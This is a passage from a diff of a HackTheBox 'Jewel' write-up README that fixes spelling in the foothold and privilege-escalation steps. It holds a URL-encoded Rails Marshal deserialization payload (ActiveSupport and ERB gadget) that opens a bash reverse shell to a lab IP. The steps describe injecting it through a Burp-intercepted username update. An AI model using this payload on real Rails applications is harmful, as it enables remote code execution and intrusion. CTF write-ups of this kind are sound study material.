x00tex/hackTheBox/Boxes/linux/Retired/jewel/README.md

 %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%3A%60bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.15.71%2F4141+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
 -->

-* start netcat, intercet the username update request in burp, past payload in username field and forward the request and then refresh the page and payload get execute and we get shell.
+* start netcat, intercept the username update request in burp, past payload in username field and forward the request and then refresh the page and payload get execute and we get shell.

   ![](screenshots/jewel-foothold.GIF)

 # Privilege Escalation

-* Running linpeas with `-a` one funny thing heppend i get sudo password of user bill:
+* Running linpeas with `-a` one funny thing happened i get sudo password of user bill:

   ![](screenshots/linpeas-bruteforce.png)